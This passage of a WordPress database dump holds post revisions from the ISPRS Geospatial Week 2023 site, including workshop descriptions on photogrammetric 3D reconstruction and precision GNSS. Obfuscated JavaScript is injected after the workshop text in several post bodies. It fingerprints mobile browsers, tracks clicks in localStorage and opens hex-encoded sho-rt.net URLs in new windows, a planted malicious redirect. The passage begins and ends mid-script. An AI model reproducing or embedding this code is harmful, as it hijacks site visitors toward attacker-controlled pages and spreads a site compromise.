i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Photogrammetric 3D Reconstruction for Geo-Applications (PhotoGA 2023)','','inherit','closed','closed','','3449-revision-v1','','','2022-12-16 14:07:03','2022-12-16 14:07:03','',3449,'https://gsw2023.com/?p=3478',0,'revision','',0),
(3479,1,'2022-12-16 14:09:22','2022-12-16 14:09:22','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">The Global Navigation Satellite Systems (GNSS) have become an indispensable component for a wide range of applications. With rapid advances in GNSS system development which currently includes four operational systems and various regional augmentation systems, high accuracy is increasingly demanded by many emerging applications. For examples, within-lane autonomous vehicle control requires dm or better positioning accuracy while dm accuracy is also demanded for smartphone-based navigation and mapping. Although high accuracy has been widely demonstrated, the use of low-cost GNSS receivers in mass-market applications present various challenges in order to achieve high accuracy with stringent requirements on system availability and integrity. This workshop will seek contributions that are addressing the related challenges. They can be research progress on the development of new concept, models, algorithms and systems for precise GNSS positioning (PPP, PPP-RTK, LEO etc) and integrated navigation systems (GNSS, INS, Vision etc), as well as novel applications to navigation and mapping including application system design, implementation, prototype, product and testing results.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Precision GNSS: Technology Advances and Applications for Navigation and Mapping</strong>','','inherit','closed','closed','','3452-revision-v1','','','2022-12-16 14:09:22','2022-12-16 14:09:22','',3452,'https://gsw2023.com/?p=3479',0,'revision','',0),
(3480,1,'2022-12-16 14:10:05','2022-12-16 14:10:05','','w26m2','','inherit','open','closed','','w26m2','','','2022-12-16 14:10:05','2022-12-16 14:10:05','',3452,'https://gsw2023.com/wp-content/uploads/2022/12/w26m2.jpg',0,'attachment','image/jpeg',0),
(3481,1,'2022-12-16 14:10:29','2022-12-16 14:10:29','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3480\" img_size=\"600x600\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">The Global Navigation Satellite Systems (GNSS) have become an indispensable component for a wide range of applications. With rapid advances in GNSS system development which currently includes four operational systems and various regional augmentation systems, high accuracy is increasingly demanded by many emerging applications. For examples, within-lane autonomous vehicle control requires dm or better positioning accuracy while dm accuracy is also demanded for smartphone-based navigation and mapping. Although high accuracy has been widely demonstrated, the use of low-cost GNSS receivers in mass-market applications present various challenges in order to achieve high accuracy with stringent requirements on system availability and integrity. This workshop will seek contributions that are addressing the related challenges. They can be research progress on the development of new concept, models, algorithms and systems for precise GNSS positioning (PPP, PPP-RTK, LEO etc) and integrated navigation systems (GNSS, INS, Vision etc), as well as novel applications to navigation and mapping including application system design, implementation, prototype, product and testing results.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 